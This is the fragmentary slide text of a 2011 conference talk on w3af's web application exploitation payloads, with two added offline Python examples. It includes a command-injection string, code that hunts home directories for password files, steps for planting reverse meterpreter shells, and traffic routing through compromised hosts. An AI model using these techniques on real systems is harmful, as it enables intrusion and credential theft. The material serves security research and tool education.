Web Application Security Payloads
Andrés Riancho Director of Web Security BlackHat 2011 - Barcelona
Topics
– Short w3af introduction
– What's new in w3af
– Automating Web application exploitation
– The problem and how other tools are
– Vulnerabilities have capabilities!
– Abstracting system calls in payloads
– Our own SCA
– Metasploit integration
– Routing TCP/IP traffic
The features and the behind the scenes story
Web Application Attack and Audit Framework
– First version released in March 2007
– Open Source tool (GPLv2.0) to identify and exploit Web vulnerabilities
– Architecture supports plug-ins (easily extensible)
– Available for free download @ www.w3af.org

– Since July 2010
– Full-time development resources
– Roadmap, prioritized backlog & structured development process
– Quality assurance
– Back office including marketing and communications
This is how it looks…
these goals:
– A low false negative rate
– Good link and code coverage
– Widely known, distributed in most (all?) hacking live CDs
– Packages for most Linux distributions
How we improved w3af in the last 3 months
– Introduced the usage of XPath queries, which will allow us to improve performance and reduce false positives in grep plugins.
– user_defined_regex.py
– form_autocomplete.py
Andalía! (w3afMustStopException: The xUrllib found too much consecutive errors.
The remote webserver doesn't seem to be reachable anymore; please verify manually.)
backend with a Bloom filter, increasing the framework's performance by ~15%.
the latest features and bug fixes we develop daily.
– Achieve a stable code base
– Increase performance for the core framework features (sending … etc.)

quickly achieve what users need:
– Identify 100% of the vulnerabilities - scan time doesn't matter
– Low false positive rate
– Plugin / extension system documentation
And how other tools are not covering it
[Slide figure: timeline labelled "Vuln!", "2 hours", "3 hours", "6 hours"]
– None of the currently available tools, Open Source or Commercial, have any post-exploitation techniques we could apply to Web application vulnerabilities in order to escalate privileges.
– Commercial exploitation platforms provide “exploits and payloads” to use in best-case scenarios, in other words, when there is control of the execution flow (“exploits for buffer
exploits because they were the most important vulnerability class.
different because they only allow us, depending on the vulnerability, to interact with the system in a particular way:
– Read a file
– Write a file
– Control a section of a SQL query
– Execute user-controlled source code
– Execute operating system commands
Helping you get root from low-privileged vulnerabilities
simple examples:
exploitation with reduced capabilities, we started to define all the actions that could be done with nothing but read() calls:
– Read Apache config files,
– Read .htpasswd files,
– Get the remote process list,
– Get the list of open TCP and UDP connections,
and MANY more.

    Web application vulnerability   Capabilities exported
    Arbitrary File Read             read()
    File upload                     write() [often restricted to a specific directory]
moved on to different scenarios where we analyzed:
– Only write()
– Only exec()
– write() and read(), which is usually found when there are two different vulnerabilities present.
payloads:
without knowing/caring which exploit is in use.
    Exploit              Exported syscalls   Emulated system calls
    Local file read      read()
    Local file include   read()
    OS Commanding        execute()           read(), write(), unlink()
    DAV Shell            write()             execute(), read(), unlink()
    File Upload          write()             execute(), read(), unlink()
emulated via the execution of "cat filename" or "type filename", depending on the OS:
challenging due to file system permissions, programming language configuration and the application itself.
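The abstraction described on the last two slides, as an added example that is not w3af's own code: the "users" payload calls shell.read() and neither knows nor cares whether read() is exported natively by a file-read exploit or emulated over execute() with "cat" or "type". The target file system, the two shell classes and the passwd contents are constructed stand-ins so the example runs offline.

```python
import shlex

# Constructed stand-in for the target's file system (not a real host).
FAKE_FS = {
    '/etc/passwd': 'root:x:0:0:root:/root:/bin/bash\n'
                   'daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n'
                   'bob:x:1000:1000:Bob:/home/bob:/bin/bash\n',
}

class FileReadShell:
    """Shell for an Arbitrary File Read vulnerability: exports read() natively."""
    def __init__(self, fs):
        self._fs = fs

    def read(self, filename):
        return self._fs.get(filename, '')

class ExecShell:
    """Shell for an OS Commanding vulnerability: exports execute() and
    emulates read() with "cat" (Linux) or "type" (Windows)."""
    def __init__(self, fs, remote_os='linux'):
        self._fs = fs
        self.remote_os = remote_os

    def execute(self, command):
        # Constructed fake of the remote shell: it only understands cat/type.
        prog, _, arg = command.partition(' ')
        if prog in ('cat', 'type'):
            return self._fs.get(arg.strip().strip('\'"'), '')
        return ''

    def read(self, filename):
        # Emulated read(): wrap the path in the right command for the remote OS.
        if self.remote_os == 'linux':
            return self.execute('cat ' + shlex.quote(filename))
        return self.execute('type "%s"' % filename)

def users_payload(shell):
    """The "users" payload: parse /etc/passwd and return {user: {'home': dir}}
    for accounts with a home under /home, whatever shell provides read()."""
    users = {}
    for line in shell.read('/etc/passwd').splitlines():
        fields = line.split(':')
        if len(fields) == 7 and fields[5].startswith('/home/'):
            users[fields[0]] = {'home': fields[5]}
    return users

if __name__ == '__main__':
    for shell in (FileReadShell(FAKE_FS), ExecShell(FAKE_FS)):
        print(type(shell).__name__, users_payload(shell))
```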
files to read and how to extract information from them:
[Slide diagram: read() → Parse → Knowledge]
within w3af is very easy
These are the steps that will be shown in the demo:
1. Start a w3af scan
2. Identify an arbitrary file read vulnerability
3. Execute the “users” payload
4. Show the results
Baby steps
    read()              System call to read files
    users               Payload that reads “/etc/passwd” and identifies home directories
    interesting_files   Uses the home directories and a list of interesting filenames to search for passwords
    import os

    interesting_extensions = []
    interesting_extensions.append('')      # no extension
    interesting_extensions.append('.txt')
    ...
    file_list = []
    file_list.append('passwords')
    file_list.append('passwd')
    ...
    # Build the candidate paths from the home directories found by "users"
    files_to_read = []
    for user in users_result:
        home = users_result[user]['home']
        for interesting_file in file_list:
            for extension in interesting_extensions:
                file_fp = os.path.join(home, interesting_file + extension)
                files_to_read.append(file_fp)
Treasure hunt
saved to the knowledge base during the scan:
– Identified vulnerabilities
– Remote Web server type (Apache, IIS, etc.)
– Remote operating system
– Found URLs
integrated into w3af!
    import os

    # Body of a payload method: reuse another payload's result and the
    # knowledge base (kb) filled during the scan
    apache_root_directory = self.exec_payload('apache_root_directory')
    webroot_list = apache_root_directory['apache_root_directory']
    url_list = kb.kb.getData('urls', 'urlList')
    for webroot in webroot_list:
        for url in url_list:
            path_and_file = getPath(url)
            relative_path_file = path_and_file[1:]   # drop the leading '/'
            remote_full_path = os.path.join(webroot, relative_path_file)
            file_content = self.shell.read(remote_full_path)
            if file_content:
                self._save_file_locally(remote_full_path, file_content)
w3af integration
possible :)
information we needed.
with Javier Andalia from Rapid7 we've developed a PHP Static Code Analyzer as a PoC to show that it is possible to combine these two technologies:
– Black-box scanning
– Static Code Analysis

[Slide diagram: w3af scan → Identify local file read → Exploit read() → SCA → Identify SQLi → Exploit write() / exec()]
Lex-Yacc)
– SQL Injection
– OS Commanding
– Arbitrary file read
– Remote file inclusion
– eval() vulnerabilities
– Taint analysis
sources of user controlled data:
– $_GET[]
– $_POST[]
– $_COOKIE[]
– $_REQUEST[]
sensitive functions like system(), eval() and mysql_query()
into account validation functions such as escapeshellarg() and intval()
– Tainted variable $bar created as concatenation of 'ls ' and user-controlled variable $_GET['foo']
– Tainted variable $bar used as parameter #1 of system() in line 2
– Exploit: /filename.php?foo=;ls

    <?
    $bar = 'ls ' . $_GET['foo'];
    system( $bar );
    ?>
– Tainted variable $foo declared in line 2, taint source is $_GET['bar']
– $foo is now clean for OS Commanding.

    <?
    $foo = $_GET['bar'];
    $foo = escapeshellarg( $foo );
    system( 'ls ' . $foo );
    ?>
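An added example, not the Rapid7/w3af SCA itself, of the taint-analysis rule the last three slides describe: superglobals taint a variable for every class, escapeshellarg() cleans it only for OS Commanding, intval() cleans it for everything, and a sink reports only if its own class is still present. It is a line-oriented approximation (the slides' SCA uses a Lex-Yacc parser) that handles one PHP statement per line; the three PHP inputs are constructed, the first two copied from slides 36 and 37, the third going beyond them to show a sanitizer for the wrong class.

```python
import re

# Sensitive functions and the vulnerability class each one sinks
SINKS = {'system': 'OS Commanding', 'eval': 'eval()', 'mysql_query': 'SQL Injection'}
ALL = set(SINKS.values())
SOURCES = ('$_GET', '$_POST', '$_COOKIE', '$_REQUEST')
# Validation functions and the one class they clean ('all' clears every class)
SANITIZERS = {'escapeshellarg': 'OS Commanding', 'intval': 'all'}
ASSIGN_RE = re.compile(r'^(\$\w+)\s*=\s*(.+);$')
CALL_RE = re.compile(r'^(\w+)\s*\(\s*(.+)\s*\)$')
SINK_RE = re.compile(r'^(\w+)\s*\(\s*(.+)\s*\);$')

def expr_taint(expr, taint):
    """Return the set of vulnerability classes an expression is tainted for."""
    m = CALL_RE.match(expr.strip())
    if m and m.group(1) in SANITIZERS:
        inner = expr_taint(m.group(2), taint)
        cleaned = SANITIZERS[m.group(1)]
        return set() if cleaned == 'all' else inner - {cleaned}
    result = set()
    for var in re.findall(r'\$\w+', expr):
        # A superglobal source is tainted for every class; any other variable
        # carries whatever taint an earlier assignment gave it.
        result |= ALL if var in SOURCES else taint.get(var, set())
    return result

def analyze(php_source):
    """Return [(line, sink_function, vulnerability)] for a one-statement-per-line file."""
    taint, findings = {}, []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        stmt = line.strip()
        if not stmt or stmt in ('<?', '<?php', '?>'):
            continue
        m = ASSIGN_RE.match(stmt)
        if m:
            taint[m.group(1)] = expr_taint(m.group(2), taint)
            continue
        m = SINK_RE.match(stmt)
        if m and m.group(1) in SINKS and SINKS[m.group(1)] in expr_taint(m.group(2), taint):
            findings.append((lineno, m.group(1), SINKS[m.group(1)]))
    return findings

# Constructed inputs: slides 36 and 37, plus a variable cleaned with
# escapeshellarg() but then used in a SQL query (still SQL Injection).
VULNERABLE = "<?\n$bar = 'ls ' . $_GET['foo'];\nsystem( $bar );\n?>"
CLEANED = "<?\n$foo = $_GET['bar'];\n$foo = escapeshellarg( $foo );\nsystem( 'ls ' . $foo );\n?>"
WRONG_SANITIZER = ("<?php\n$id = $_GET['id'];\n$id = escapeshellarg( $id );\n"
                   "mysql_query( 'SELECT * FROM t WHERE id=' . $id );\n?>")

if __name__ == '__main__':
    print(analyze(VULNERABLE), analyze(CLEANED), analyze(WRONG_SANITIZER))
```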
A step closer to retirement
many important functions such as:
– Support for require_once(), require(), include_once(), include()
– Better support for loops and if statements
– Classes, methods and attributes
– Detection for all vulnerabilities
That was easy!
commands using our web application payloads that run with low privileges, now what?
payloads:
– msf_linux_x86_meterpreter_reverse
– msf_windows_meterpreter_reverse_tcp
– msf_windows_vncinject_reverse
– w3af_agent
through the following steps:
1. w3af runs msfpayload and creates an EXE/ELF
2. Upload the EXE file to the remote server using "echo" or a "reverse wget"
3. Run a msfcli with a payload handler in the w3af box
4. Run the payload in the remote host
msf_linux_x86_meterpreter_reverse
compromised host without any effort.
1. w3af uploads an agent client to the remote host
2. The agent client connects back, and the TCP connections are kept alive to route traffic.
3. w3af starts a SOCKS daemon in the local machine, which is the entry point for all connections that the user wants to forward.
Routing traffic through the compromised host
for which we only have a small PoC, but I wanted to explain it here to get feedback and new ideas.
application security payload developer) was to create a framework that would hook into a process' and forward it
application exploit.
installed on the host running w3af in the remote box. A simple example would be “clamav”.
emulated read()
with the reality of software; it's a foundation for building tools to do tracing, sandboxing, and many other things. You could think of it as "strace meets expect".”
ptrace and modifying its state, but has two big issues:
– Not supported by the original developer anymore
– Doesn't work on 64-bit architectures
    # Called before Linux's read() syscall
    def callbefore(self, pid, call, args):
        m = Memory.getMemory(pid)
        arg_mem_addr_path = args[0]
        filename = m.get_string(arg_mem_addr_path)
        # Calling the "read" syscall of one of w3af's exploits
        local_filename = self.shell.download(filename)
        area, area_size = m.areas()[0]
        m.poke(area, local_filename + '\0')
        # Rewrite the syscall in order to read the local file
        return (None, None, None, (area, args[1], args[2]))
– Launch a new scan against a particular resource
– Exploit vulnerabilities using the increased knowledge obtained by w3af's payloads
exploitation of Web application vulnerabilities.
http://www.w3af.org/mailing-list.php
application security payloads, w3af agent and metasploit wrapper can be found in these directories:
– plugins/attack/payloads/
– core/controllers/vdaemon/
– core/controllers/w3afAgent/
– core/controllers/payloadTransfer/
http://w3af.svn.sourceforge.net/viewvc/w3af/trunk/
Web Application Center of Excellence, Buenos Aires, Argentina